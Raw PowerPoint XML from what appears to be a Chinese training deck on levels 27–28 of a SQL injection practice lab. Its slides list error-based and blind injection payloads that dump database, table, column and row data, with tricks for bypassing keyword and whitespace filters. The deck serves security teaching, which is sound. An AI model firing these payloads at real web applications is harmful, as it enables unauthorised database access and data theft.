              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>||</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> updatexml(1,concat(0x7e,(select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>group_concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>))</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>rmation_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>='security'),0x7e),1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>||</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 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1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=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1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判断列名：'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>||</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>a0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>updatexml(1,concat(0x7e,(select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>a0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>a0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>a0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>rmation_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>a0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>a0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>table_schema='security'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>a0%26%26</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>a0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>table_name='emails'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>a0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> limit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>a0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>0,1),0x7e),1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>||</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 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1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=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1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判断数据：'and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>||</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 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1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=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1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第二十七关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75" y="3680460"/>
            <a:ext cx="5715000" cy="3095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84045" y="2024380"/>
            <a:ext cx="8648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分析源码发现，这一关没有检测又屏蔽了我们的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>union</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，但由于他这里是黑名单的显示，所以我们很轻易的能绕过去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第二十七关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235710" y="2060575"/>
            <a:ext cx="97764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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>判断库名： 'and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>updatexml(1,concat(0x7e,(database()),0x7e),1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>or 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1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判断表名：'and%0aupdatexml(1,concat(0x7e,(sel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>ct%0atable_name%0afrom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> information_schema.tables%0awhere%0atable_schema='security'limit%0a0,1),0x7e),1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>or 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1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判断列名：'and%0aupdatexml(1,concat(0x7e,(s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>lect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>table_schema='security'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>table_name='emails'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>limit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>0,1),0x7e),1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>or 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1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判断数据：'and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>updatexml(1,concat(0x7e,(s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>lect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>emails</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>limit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>0,1),0x7e),1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>or 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1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第二十八关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84045" y="1592580"/>
            <a:ext cx="8327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还是先来看看他过滤了那些地方，发现这题主要是注释了两次空格</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的注释和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>union select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的组合，并且是不区分大小写的，之前的靶场我们已经讲过空格和注释的代替方式这次主要是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>union select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，他既然不允许连起来用我们就可以尝试用一些特殊符号把他们隔开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235" y="3680460"/>
            <a:ext cx="6162675" cy="23241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第二十八关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35710" y="1808480"/>
            <a:ext cx="9126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?id=1'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> and (length(database()))=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>%0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and(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1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)=(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42695" y="2294255"/>
            <a:ext cx="3570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利用ASCII码猜解当前数据库名称：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42695" y="2816225"/>
            <a:ext cx="9744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?id=1'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> and (ascii(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>(database(),1,1)))=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>115</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%0aand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(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1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)=(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1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 返回正常，说明数据库名称第一位是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>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35710" y="3361373"/>
            <a:ext cx="98659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?id=1'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> and (ascii(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>(database(),2,1)))=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>101</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%0aand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(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1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)=(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1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 返回正常，说明数据库名称第二位是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>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15085" y="39325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猜表名：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22727" y="4247342"/>
            <a:ext cx="108375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?id=1'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> and (ascii(substr((select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> table_schema=database()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>limit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>0,1),1,1)))=101</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>0aand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(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1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)=(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1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 如果返回正常，说明数据库表名的第一个的第一位是e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35710" y="5570855"/>
            <a:ext cx="104451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and (ascii(substr((select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> table_name='emails'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>limit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>0,1),1,1)))=105</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>0aand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(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1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)=(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 如果返回正常，说明</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>emails</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>表中的列名称第一位是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>i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1235710" y="51460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猜字段名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360805" y="1423035"/>
            <a:ext cx="927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猜解库名长度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40,&quot;width&quot;:10350}"/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="sx272TGp_report_light">
  <a:themeElements>
    <a:clrScheme name="sx272TGp_report_light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sx272TGp_report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x272TGp_report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903</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>44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黑体</vt:lpstr>
      <vt:lpstr>楷体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>sx272TGp_report_light</vt:lpstr>
